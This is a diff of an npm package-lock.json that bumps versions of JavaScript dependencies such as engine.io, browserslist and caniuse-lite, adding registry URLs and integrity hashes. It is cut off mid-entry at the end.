+3443,9 @@ }, "node_modules/@foliojs-fork/restructure": { "version": "2.0.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/@foliojs-fork/restructure/-/restructure-2.0.2.tgz", + "integrity": "sha512-59SgoZ3EXbkfSX7b63tsou/SDGzwUEK6MuB5sKqgVK1/XE0fxmpsOb9DQI8LXW3KfGnAjImCGhhEb7uPPAUVNA==", + "dev": true }, "node_modules/@istanbuljs/schema": { "version": "0.1.2", @@ -3174,6 +3463,31 @@ "node": ">=6.0.0" } }, + "node_modules/@jridgewell/sourcemap-codec": { + "version": "1.4.11", + "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.11.tgz", + "integrity": "sha512-Fg32GrJo61m+VqYSdRSjRXMjQ06j8YIYfcTqndLYVAaHmroZHLJZCydsWBOTDqXS2v+mjxohBWEMfg97GXmYQg==", + "dev": true + }, + "node_modules/@jridgewell/trace-mapping": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.4.tgz", + "integrity": "sha512-vFv9ttIedivx0ux3QSjhgtCVjPZd5l46ZOMDSCwnH1yUO2e964gO8LZGyv2QkqcgR6TnBU1v+1IFqmeoG+0UJQ==", + "dev": true, + "dependencies": { + "@jridgewell/resolve-uri": "^3.0.3", + "@jridgewell/sourcemap-codec": "^1.4.10" + } + }, + "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/resolve-uri": { + "version": "3.0.5", + "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.0.5.tgz", + "integrity": "sha512-VPeQ7+wH0itvQxnG+lIzWgkysKIr3L9sslimFW55rHMdGu/qCQ5z5h9zq4gI8uBtqkpHhsF4Z/OwExufUCThew==", + "dev": true, + "engines": { + "node": ">=6.0.0" + } + }, "node_modules/@jsdevtools/coverage-istanbul-loader": { "version": "3.0.5", "dev": true, @@ -3418,6 +3732,15 @@ "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", "dev": true }, + "node_modules/@socket.io/base64-arraybuffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@socket.io/base64-arraybuffer/-/base64-arraybuffer-1.0.2.tgz", + "integrity": "sha512-dOlCBKnDw4iShaIsH/bxujKTM18+2TOAsYz+KSc11Am38H4q5Xw8Bbz97ZYdrVNM+um3p7w86Bvvmcn9q+5+eQ==", + "dev": true, + "engines": { + "node": ">= 0.6.0" + } + }, "node_modules/@tootallnate/once": { "version": "1.1.2", "dev": true, @@ -3435,11 +3758,12 @@ } }, "node_modules/@ts-morph/common": { - "version": "0.10.1", + "version": "0.12.3", + "resolved": "https://registry.npmjs.org/@ts-morph/common/-/common-0.12.3.tgz", + "integrity": "sha512-4tUmeLyXJnJWvTFOKtcNJ1yh0a3SsTLi2MUoyj8iUNznFRN1ZquaNe7Oukqrnki2FzZkm0J9adCNLDZxUzvj+w==", "dev": true, - "license": "MIT", "dependencies": { - "fast-glob": "^3.2.5", + "fast-glob": "^3.2.7", "minimatch": "^3.0.4", "mkdirp": "^1.0.4", "path-browserify": "^1.0.1" @@ -3447,8 +3771,9 @@ }, "node_modules/@ts-morph/common/node_modules/mkdirp": { "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", "dev": true, - "license": "MIT", "bin": { "mkdirp": "bin/cmd.js" }, @@ -3456,25 +3781,23 @@ "node": ">=10" } }, - "node_modules/@ts-morph/common/node_modules/path-browserify": { - "version": "1.0.1", - "dev": true, - "license": "MIT" - }, "node_modules/@types/component-emitter": { - "version": "1.2.10", - "dev": true, - "license": "MIT" + "version": "1.2.11", + "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.11.tgz", + "integrity": "sha512-SRXjM+tfsSlA9VuG8hGO2nft2p8zjXCK1VcC6N4NXbBbYbSia9kzCChYQajIjzIqOOOuh5Ock6MmV2oux4jDZQ==", + "dev": true }, "node_modules/@types/cookie": { "version": "0.4.1", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-XW/Aa8APYr6jSVVA1y/DEIZX0/GMKLEVekNG727R8cs56ahETkRAy/3DR7+fJyh7oUgGwNQaRfXCun0+KbWY7Q==", + "dev": true }, "node_modules/@types/cors": { "version": "2.8.12", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.12.tgz", + "integrity": "sha512-vt+kDhq/M2ayberEtJcIN/hxXy1Pk+59g2FV/ZQceeaTyCtCucjL2Q7FXlFjtWn4n15KCr1NE2lNNFhp0lEThw==", + "dev": true }, "node_modules/@types/eslint": { "version": "7.28.1", @@ -3823,8 +4146,9 @@ }, "node_modules/acorn-node": { "version": "1.8.2", + "resolved": "https://registry.npmjs.org/acorn-node/-/acorn-node-1.8.2.tgz", + "integrity": "sha512-8mt+fslDufLYntIoPAaIMUe/lrbrehIiwmR3t2k9LljIzoigEPF27eLk2hy8zSGzmR/ogr7zbRKINMo1u0yh5A==", "dev": true, - "license": "Apache-2.0", "dependencies": { "acorn": "^7.0.0", "acorn-walk": "^7.0.0", @@ -3833,8 +4157,9 @@ }, "node_modules/acorn-node/node_modules/acorn": { "version": "7.4.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", + "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", "dev": true, - "license": "MIT", "bin": { "acorn": "bin/acorn" }, @@ -3844,8 +4169,9 @@ }, "node_modules/acorn-walk": { "version": "7.2.0", + "resolved": "https://registry.npmjs.org/acorn-walk/-/acorn-walk-7.2.0.tgz", + "integrity": "sha512-OPdCF6GsMIP+Az+aWfAAOEt2/+iVDKE7oy6lJ098aoe59oAmK76qV6Gw60SbZ8jHuG2wH058GF4pLFbYamYrVA==", "dev": true, - "license": "MIT", "engines": { "node": ">=0.4.0" } @@ -4000,8 +4326,9 @@ }, "node_modules/amdefine": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/amdefine/-/amdefine-1.0.1.tgz", + "integrity": "sha1-SlKCrBZHKek2Gbz9OtFR+BfOkfU=", "dev": true, - "license": "BSD-3-Clause OR MIT", "optional": true, "engines": { "node": ">=0.4.2" @@ -4090,8 +4417,9 @@ }, "node_modules/apache-crypt": { "version": "1.2.5", + "resolved": "https://registry.npmjs.org/apache-crypt/-/apache-crypt-1.2.5.tgz", + "integrity": "sha512-ICnYQH+DFVmw+S4Q0QY2XRXD8Ne8ewh8HgbuFH4K7022zCxgHM0Hz1xkRnUlEfAXNbwp1Cnhbedu60USIfDxvg==", "dev": true, - "license": "MIT", "dependencies": { "unix-crypt-td-js": "^1.1.4" }, @@ -4101,8 +4429,9 @@ }, "node_modules/apache-md5": { "version": "1.1.7", + "resolved": "https://registry.npmjs.org/apache-md5/-/apache-md5-1.1.7.tgz", + "integrity": "sha512-JtHjzZmJxtzfTSjsCyHgPR155HBe5WGyUyHTaEkfy46qhwCFKx1Epm6nAxgUG3WfUZP1dWhGqj9Z2NOBeZ+uBw==", "dev": true, - "license": "MIT", "engines": { "node": ">=8" } @@ -4185,8 +4514,9 @@ }, "node_modules/array-from": { "version": "2.1.1", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/array-from/-/array-from-2.1.1.tgz", + "integrity": "sha1-z+nYwmYoudxa7MYqn12PHzUsEZU=", + "dev": true }, "node_modules/array-union": { "version": "2.1.0", @@ -4244,35 +4574,19 @@ }, "node_modules/ast-transform": { "version": "0.0.0", + "resolved": "https://registry.npmjs.org/ast-transform/-/ast-transform-0.0.0.tgz", + "integrity": "sha1-dJRAWIh9goPhidlUYAlHvJj+AGI=", "dev": true, - "license": "MIT", "dependencies": { "escodegen": "~1.2.0", "esprima": "~1.0.4", "through": "~2.3.4" } }, - "node_modules/ast-transform/node_modules/escodegen": { - "version": "1.2.0", - "dev": true, - "dependencies": { - "esprima": "~1.0.4", - "estraverse": "~1.5.0", - "esutils": "~1.0.0" - }, - "bin": { - "escodegen": "bin/escodegen.js", - "esgenerate": "bin/esgenerate.js" - }, - "engines": { - "node": ">=0.4.0" - }, - "optionalDependencies": { - "source-map": "~0.1.30" - } - }, "node_modules/ast-transform/node_modules/esprima": { "version": "1.0.4", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-1.0.4.tgz", + "integrity": "sha1-n1V+CPw7TSbs6d00+Pv0drYlha0=", "dev": true, "bin": { "esparse": "bin/esparse.js", @@ -4282,35 +4596,11 @@ "node": ">=0.4.0" } }, - "node_modules/ast-transform/node_modules/estraverse": { - "version": "1.5.1", - "dev": true, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/ast-transform/node_modules/esutils": { - "version": "1.0.0", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/ast-transform/node_modules/source-map": { - "version": "0.1.43", - "dev": true, - "optional": true, - "dependencies": { - "amdefine": ">=0.0.4" - }, - "engines": { - "node": ">=0.8.0" - } - }, "node_modules/ast-types": { "version": "0.7.8", + "resolved": "https://registry.npmjs.org/ast-types/-/ast-types-0.7.8.tgz", + "integrity": "sha1-kC0uDWDQcb3NRtwRXhgJ7RHBOKk=", "dev": true, - "license": "MIT", "engines": { "node": ">= 0.6" } @@ -4541,26 +4831,6 @@ "@babel/core": "^7.0.0-0" } }, - "node_modules/babel-runtime": { - "version": "6.26.0", - "dev": true, - "license": "MIT", - "dependencies": { - "core-js": "^2.4.0", - "regenerator-runtime": "^0.11.0" - } - }, - "node_modules/babel-runtime/node_modules/core-js": { - "version": "2.6.12", - "dev": true, - "hasInstallScript": true, - "license": "MIT" - }, - "node_modules/babel-runtime/node_modules/regenerator-runtime": { - "version": "0.11.1", - "dev": true, - "license": "MIT" - }, "node_modules/balanced-match": { "version": "1.0.0", "license": "MIT" @@ -4593,13 +4863,6 @@ "node": ">=0.10.0" } }, - "node_modules/base64-arraybuffer": { - "version": "0.1.4", - "dev": true, - "engines": { - "node": ">= 0.6.0" - } - }, "node_modules/base64-js": { "version": "1.3.1", "dev": true, @@ -4607,16 +4870,18 @@ }, "node_modules/base64id": { "version": "2.0.0", + "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", + "integrity": "sha512-lGe34o6EHj9y3Kts9R4ZYs/Gr+6N7MCaMlIFA3F1R2O5/m7K06AxfSeO5530PEERE6/WyEg3lsuyw4GHlPZHog==", "dev": true, - "license": "MIT", "engines": { "node": "^4.5.0 || >= 5.9" } }, "node_modules/basic-auth": { "version": "2.0.1", + "resolved": "https://registry.npmjs.org/basic-auth/-/basic-auth-2.0.1.tgz", + "integrity": "sha512-NF+epuEdnUYVlGuhaxbbq+dvJttwLnGY+YixlXlME5KpQ5W3CnXA5cVTneY3SPbPDRkcjMbifrwmFYcClgOZeg==", "dev": true, - "license": "MIT", "dependencies": { "safe-buffer": "5.1.2" }, @@ -4638,8 +4903,9 @@ }, "node_modules/bcryptjs": { "version": "2.4.3", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/bcryptjs/-/bcryptjs-2.4.3.tgz", + "integrity": "sha1-mrVie5PmBiH/fNrF2pczAn3x0Ms=", + "dev": true }, "node_modules/big.js": { "version": "5.2.2", @@ -4656,6 +4922,16 @@ "node": ">=8" } }, + "node_modules/bindings": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/bindings/-/bindings-1.5.0.tgz", + "integrity": "sha512-p2q/t/mhvuOj/UeLlV6566GD/guowlr0hHxClI0W9m7MWYkL1F0hLo+0Aexs9HSPCtR1SXQ0TD3MMKrXZajbiQ==", + "dev": true, + "optional": true, + "dependencies": { + "file-uri-to-path": "1.0.0" + } + }, "node_modules/bl": { "version": "4.1.0", "dev": true, @@ -4787,8 +5063,9 @@ }, "node_modules/brfs": { "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brfs/-/brfs-2.0.2.tgz", + "integrity": "sha512-IrFjVtwu4eTJZyu8w/V2gxU7iLTtcHih67sgEdzrhjLBMHp2uYefUBfdM4k2UvcuWMgV7PQDZHSLeNWnLFKWVQ==", "dev": true, - "license": "MIT", "dependencies": { "quote-stream": "^1.0.1", "resolve": "^1.1.5", @@ -4801,29 +5078,33 @@ }, "node_modules/brotli": { "version": "1.3.2", + "resolved": "https://registry.npmjs.org/brotli/-/brotli-1.3.2.tgz", + "integrity": "sha1-UlqcrU/LqWR119OI9q7LE+7VL0Y=", "dev": true, - "license": "MIT", "dependencies": { "base64-js": "^1.1.2" } }, "node_modules/browser-resolve": { "version": "1.11.3", + "resolved": "https://registry.npmjs.org/browser-resolve/-/browser-resolve-1.11.3.tgz", + "integrity": "sha512-exDi1BYWB/6raKHmDTCicQfTkqwN5fioMFV4j8BsfMU4R2DK/QfZfK7kOVkmWCNANf0snkBzqGqAJBao9gZMdQ==", "dev": true, - "license": "MIT", "dependencies": { "resolve": "1.1.7" } }, "node_modules/browser-resolve/node_modules/resolve": { "version": "1.1.7", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.1.7.tgz", + "integrity": "sha1-IDEU2CrSxe2ejgQRs5ModeiJ6Xs=", + "dev": true }, "node_modules/browserify-optional": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/browserify-optional/-/browserify-optional-1.0.1.tgz", + "integrity": "sha1-HhNyLP3g2F8SFnbCpyztUzoBiGk=", "dev": true, - "license": "MIT", "dependencies": { "ast-transform": "0.0.0", "ast-types": "^0.7.0", @@ -4831,14 +5112,15 @@ } }, "node_modules/browserslist": { - "version": "4.16.6", - "license": "MIT", + "version": "4.19.3", + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.19.3.tgz", + "integrity": "sha512-XK3X4xtKJ+Txj8G5c30B4gsm71s69lqXlkYui4s6EkKxuv49qjYlY6oVd+IFJ73d4YymtM3+djvvt/R/iJwwDg==", "dependencies": { - "caniuse-lite": "^1.0.30001219", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.723", + "caniuse-lite": "^1.0.30001312", + "electron-to-chromium": "^1.4.71", "escalade": "^3.1.1", - "node-releases": "^1.1.71" + "node-releases": "^2.0.2", + "picocolors": "^1.0.0" }, "bin": { "browserslist": "cli.js" @@ -4851,6 +5133,11 @@ "url": "https://opencollective.com/browserslist" } }, + "node_modules/browserslist/node_modules/picocolors": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", + "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==" + }, "node_modules/browserstack": { "version": "1.6.0", "dev": true, @@ -4884,8 +5171,9 @@ }, "node_modules/buffer-equal": { "version": "0.0.1", + "resolved": "https://registry.npmjs.org/buffer-equal/-/buffer-equal-0.0.1.tgz", + "integrity": "sha1-kbx0sR6kBbyRa8aqkI+q+ltKrEs=", "dev": true, - "license": "MIT", "engines": { "node": ">=0.4.0" } @@ -4992,6 +5280,8 @@ }, "node_modules/callsite": { "version": "1.0.0", + "resolved": "https://registry.npmjs.org/callsite/-/callsite-1.0.0.tgz", + "integrity": "sha1-KAOY5dZkvXQDi28JBRU+borxvCA=", "dev": true, "engines": { "node": "*" @@ -5020,8 +5310,9 @@ } }, "node_modules/caniuse-lite": { - "version": "1.0.30001239", - "license": "CC-BY-4.0", + "version": "1.0.30001312", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001312.tgz", + "integrity": "sha512-Wiz1Psk2MEK0pX3rUzWaunLTZzqS2JYZFzNKqAiJGiuxIjRPLgV6+VDPOg6lQOUxmDwhTlh198JsTTi8Hzw6aQ==", "funding": { "type": "opencollective", "url": "https://opencollective.com/browserslist" @@ -5106,6 +5397,19 @@ "fsevents": "~2.3.2" } }, + "node_modules/chokidar/node_modules/fsevents": { + "version": "2.3.2", + "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", + "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", + "hasInstallScript": true, + "optional": true, + "os": [ + "darwin" + ], + "engines": { + "node": "^8.16.0 || ^10.6.0 || >=11.0.0" + } + }, "node_modules/chownr": { "version": "2.0.0", "dev": true, @@ -5309,9 +5613,13 @@ } }, "node_modules/code-block-writer": { - "version": "10.1.1", + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/code-block-writer/-/code-block-writer-11.0.0.tgz", + "integrity": "sha512-GEqWvEWWsOvER+g9keO4ohFoD3ymwyCnqY3hoTr7GZipYFwEhMHJw+TtV0rfgRhNImM6QWZGO2XYjlJVyYT62w==", "dev": true, - "license": "MIT" + "dependencies": { + "tslib": "2.3.1" + } }, "node_modules/code-point-at": { "version": "1.1.0", @@ -5426,6 +5734,7 @@ }, "node_modules/colorette": { "version": "1.2.2", + "dev": true, "license": "MIT" }, "node_modules/colors": { @@ -5495,11 +5804,12 @@ }, "node_modules/concat-stream": { "version": "1.6.2", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", "dev": true, "engines": [ "node >= 0.8" ], - "license": "MIT", "dependencies": { "buffer-from": "^1.0.0", "inherits": "^2.0.3", @@ -5559,9 +5869,10 @@ } }, "node_modules/cookie": { - "version": "0.4.1", + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.2.tgz", + "integrity": "sha512-aSWTXFzaKWkvHO1Ny/s+ePFpvKsPnjc551iI41v3ny/ow6tBG5Vd+FuqGNhh1LxOmVzOlGUriIlOaokOvhaStA==", "dev": true, - "license": "MIT", "engines": { "node": ">= 0.6" } @@ -5662,11 +5973,12 @@ } }, "node_modules/core-js-compat": { - "version": "3.15.1", + "version": "3.21.1", + "resolved": "https://registry.npmjs.org/core-js-compat/-/core-js-compat-3.21.1.tgz", + "integrity": "sha512-gbgX5AUvMb8gwxC7FLVWYT7Kkgu/y7+h/h1X43yJkNqhlK2fuYyQimqvKGNZFAY6CKii/GFKJ2cp/1/42TN36g==", "dev": true, - "license": "MIT", "dependencies": { - "browserslist": "^4.16.6", + "browserslist": "^4.19.1", "semver": "7.0.0" }, "funding": { @@ -5688,8 +6000,9 @@ }, "node_modules/cors": { "version": "2.8.5", + "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.5.tgz", + "integrity": "sha512-KIHbLJqu73RGr/hnbrO9uBeixNGuvSQjul/jdFvS/KFSIH1hWVd1ng7zOHx+YrEfInLG7q4n6GHQ9cDtxv/P6g==", "dev": true, - "license": "MIT", "dependencies": { "object-assign": "^4", "vary": "^1" @@ -5831,8 +6144,9 @@ }, "node_modules/crypto-js": { "version": "4.1.1", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/crypto-js/-/crypto-js-4.1.1.tgz", + "integrity": "sha512-o2JlM7ydqd3Qk9CA0L4NL6mTzU2sdx96a+oOfPu8Mkl/PK51vSyoi8/rQ8NknZtk44vq15lmhAj9CIAGwgeWKw==", + "dev": true }, "node_modules/css": { "version": "3.0.0", @@ -6338,8 +6652,9 @@ }, "node_modules/d": { "version": "1.0.1", + "resolved": "https://registry.npmjs.org/d/-/d-1.0.1.tgz", + "integrity": "sha512-m62ShEObQ39CfralilEQRjH6oAMtNCV1xJyEx5LpRYUVN+EviphDgUc/F3hnYbADmkiNs67Y+3ylmlG7Lnu+FA==", "dev": true, - "license": "ISC", "dependencies": { "es5-ext": "^0.10.50", "type": "^1.0.1" @@ -6351,9 +6666,10 @@ "license": "BSD-2-Clause" }, "node_modules/dash-ast": { - "version": "1.0.0", - "dev": true, - "license": "Apache-2.0" + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/dash-ast/-/dash-ast-2.0.1.tgz", + "integrity": "sha512-5TXltWJGc+RdnabUGzhRae1TRq6m4gr+3K2wQX0is5/F2yS6MJXJvLyI3ErAnsAXuJoGqvfVD5icRgim07DrxQ==", + "dev": true }, "node_modules/dashdash": { "version": "1.14.1", @@ -6366,9 +6682,10 @@ } }, "node_modules/date-format": { - "version": "3.0.0", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/date-format/-/date-format-4.0.3.tgz", + "integrity": "sha512-7P3FyqDcfeznLZp2b+OMitV9Sz2lUnsT87WaTat9nVwqsBkTzPG3lPLNwW3en6F4pHUiWzr6vb8CLhjdK9bcxQ==", "dev": true, - "license": "MIT", "engines": { "node": ">=4.0" } @@ -6381,9 +6698,10 @@ } }, "node_modules/decache": { - "version": "4.6.0", + "version": "4.6.1", + "resolved": "https://registry.npmjs.org/decache/-/decache-4.6.1.tgz", + "integrity": "sha512-ohApBM8u9ygepJCjgBrEZSSxPjc0T/PJkD+uNyxXPkqudyUpdXpwJYp0VISm2WrPVzASU6DZyIi6BWdyw7uJ2Q==", "dev": true, - "license": "MIT", "dependencies": { "callsite": "^1.0.0" } @@ -6421,9 +6739,10 @@ } }, "node_modules/deep-is": { - "version": "0.1.3", - "dev": true, - "license": "MIT" + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", + "dev": true }, "node_modules/default-gateway": { "version": "4.2.0", @@ -6659,8 +6978,9 @@ }, "node_modules/dfa": { "version": "1.2.0", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz", + "integrity": "sha512-ED3jP8saaweFTjeGX8HQPjeC1YYyZs98jGNZx6IiBvxW7JG5v492kamAQB3m2wop07CvU/RQmzcKr6bgcC5D/Q==", + "dev": true }, "node_modules/di": { "version": "0.0.1", @@ -6790,13 +7110,15 @@ }, "node_modules/duplexer": { "version": "0.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/duplexer/-/duplexer-0.1.2.tgz", + "integrity": "sha512-jtD6YG370ZCIi/9GTaJKQxWTZD045+4R4hTk/x1UyoqadyJ9x9CgSi1RlVDQF8U2sxLLSnFkCaMihqljHIWgMg==", + "dev": true }, "node_modules/duplexer2": { "version": "0.1.4", + "resolved": "https://registry.npmjs.org/duplexer2/-/duplexer2-0.1.4.tgz", + "integrity": "sha1-ixLauHjA1p4+eJEFFmKjL8a93ME=", "dev": true, - "license": "BSD-3-Clause", "dependencies": { "readable-stream": "^2.0.2" } @@ -6814,8 +7136,9 @@ "license": "MIT" }, "node_modules/electron-to-chromium": { - "version": "1.3.756", - "license": "ISC" + "version": "1.4.71", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.71.tgz", + "integrity": "sha512-Hk61vXXKRb2cd3znPE9F+2pLWdIOmP7GjiTj45y6L3W/lO+hSnUSUhq+6lEaERWBdZOHbk2s3YV5c9xVl3boVw==" }, "node_modules/emoji-regex": { "version": "7.0.3", @@ -6867,37 +7190,43 @@ } }, "node_modules/engine.io": { - "version": "4.1.1", + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.1.2.tgz", + "integrity": "sha512-v/7eGHxPvO2AWsksyx2PUsQvBafuvqs0jJJQ0FdmJG1b9qIvgSbqDRGwNhfk2XHaTTbTXiC4quRE8Q9nRjsrQQ==", "dev": true, - "license": "MIT", "dependencies": { + "@types/cookie": "^0.4.1", + "@types/cors": "^2.8.12", + "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "2.0.0", "cookie": "~0.4.1", "cors": "~2.8.5", "debug": "~4.3.1", - "engine.io-parser": "~4.0.0", - "ws": "~7.4.2" + "engine.io-parser": "~5.0.0", + "ws": "~8.2.3" }, "engines": { "node": ">=10.0.0" } }, "node_modules/engine.io-parser": { - "version": "4.0.3", + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.0.3.tgz", + "integrity": "sha512-BtQxwF27XUNnSafQLvDi0dQ8s3i6VgzSoQMJacpIcGNrlUdfHSKbgm3jmjCVvQluGzqwujQMPAoMai3oYSTurg==", "dev": true, - "license": "MIT", "dependencies": { - "base64-arraybuffer": "0.1.4" + "@socket.io/base64-arraybuffer": "~1.0.2" }, "engines": { - "node": ">=8.0.0" + "node": ">=10.0.0" } }, "node_modules/engine.io/node_modules/debug": { - "version": "4.3.2", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, - "license": "MIT", "dependencies": { "ms": "2.1.2" }, @@ -6912,15 +7241,17 @@ }, "node_modules/engine.io/node_modules/ms": { "version": "2.1.2", - "dev": true, - "license": "MIT" + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true }, "node_modules/engine.io/node_modules/ws": { - "version": "7.4.6", + "version": "8.2.3", + "resolved": "https://registry.npmjs.org/ws/-/ws-8.2.3.tgz", + "integrity": "sha512-wBuoj1BDpC6ZQ1B7DWQBYVLphPWkm8i9Y0/3YdHjHKHiohOJ1ws+3OccDWtH+PoC9DZD5WOTrJvNbWvjS6JWaA==", "dev": true, - "license": "MIT", "engines": { - "node": ">=8.3.0" + "node": ">=10.0.0" }, "peerDependencies": { "bufferutil": "^4.0.1", @@ -7073,14 +7404,6 @@ "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/es-abstract/node_modules/object-inspect": { - "version": "1.11.0", - "dev": true, - "license": "MIT", - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, "node_modules/es-abstract/node_modules/string.prototype.trimend": { "version": "1.0.4", "dev": true, @@ -7128,8 +7451,9 @@ }, "node_modules/es5-ext": { "version": "0.10.53", + "resolved": "https://registry.npmjs.org/es5-ext/-/es5-ext-0.10.53.tgz", + "integrity": "sha512-Xs2Stw6NiNHWypzRTY1MtaG/uJlwCk8kH81920ma8mvN8Xq1gsfhZvpkImLQArw8AHnv8MT2I45J3c0R8slE+Q==", "dev": true, - "license": "ISC", "dependencies": { "es6-iterator": "~2.0.3", "es6-symbol": "~3.1.3", @@ -7138,8 +7462,9 @@ }, "node_modules/es6-iterator": { "version": "2.0.3", + "resolved": "https://registry.npmjs.org/es6-iterator/-/es6-iterator-2.0.3.tgz", + "integrity": "sha1-p96IkUGgWpSwhUQDstCg+/qY87c=", "dev": true, - "license": "MIT", "dependencies": { "d": "1", "es5-ext": "^0.10.35", @@ -7148,8 +7473,9 @@ }, "node_modules/es6-map": { "version": "0.1.5", + "resolved": "https://registry.npmjs.org/es6-map/-/es6-map-0.1.5.tgz", + "integrity": "sha1-kTbgUD3MBqMBaQ8LsU/042TpSfA=", "dev": true, - "license": "MIT", "dependencies": { "d": "1", "es5-ext": "~0.10.14", @@ -7174,8 +7500,9 @@ }, "node_modules/es6-set": { "version": "0.1.5", + "resolved": "https://registry.npmjs.org/es6-set/-/es6-set-0.1.5.tgz", + "integrity": "sha1-0rPsXU2ADO2BjbU40ol02wpzzLE=", "dev": true, - "license": "MIT", "dependencies": { "d": "1", "es5-ext": "~0.10.14", @@ -7186,8 +7513,9 @@ }, "node_modules/es6-set/node_modules/es6-symbol": { "version": "3.1.1", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.1.tgz", + "integrity": "sha1-vwDvT9q2uhtG7Le2KbTH7VcVzHc=", "dev": true, - "license": "MIT", "dependencies": { "d": "1", "es5-ext": "~0.10.14" @@ -7195,8 +7523,9 @@ }, "node_modules/es6-symbol": { "version": "3.1.3", + "resolved": "https://registry.npmjs.org/es6-symbol/-/es6-symbol-3.1.3.tgz", + "integrity": "sha512-NJ6Yn3FuDinBaBRWl/q5X/s4koRHBrgKAu+yGI6JCBeiu3qrcbJhwT2GeR/EXVfylRk8dpQVJoLEFhK+Mu31NA==", "dev": true, - "license": "ISC", "dependencies": { "d": "^1.0.1", "ext": "^1.1.2" @@ -7272,33 +7601,68 @@ } }, "node_modules/escodegen": { - "version": "1.14.3", + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.2.0.tgz", + "integrity": "sha1-Cd55Z3kcyVi3+Jot220jRRrzJ+E=", "dev": true, - "license": "BSD-2-Clause", "dependencies": { - "esprima": "^4.0.1", - "estraverse": "^4.2.0", - "esutils": "^2.0.2", - "optionator": "^0.8.1" + "esprima": "~1.0.4", + "estraverse": "~1.5.0", + "esutils": "~1.0.0" }, "bin": { "escodegen": "bin/escodegen.js", "esgenerate": "bin/esgenerate.js" }, "engines": { - "node": 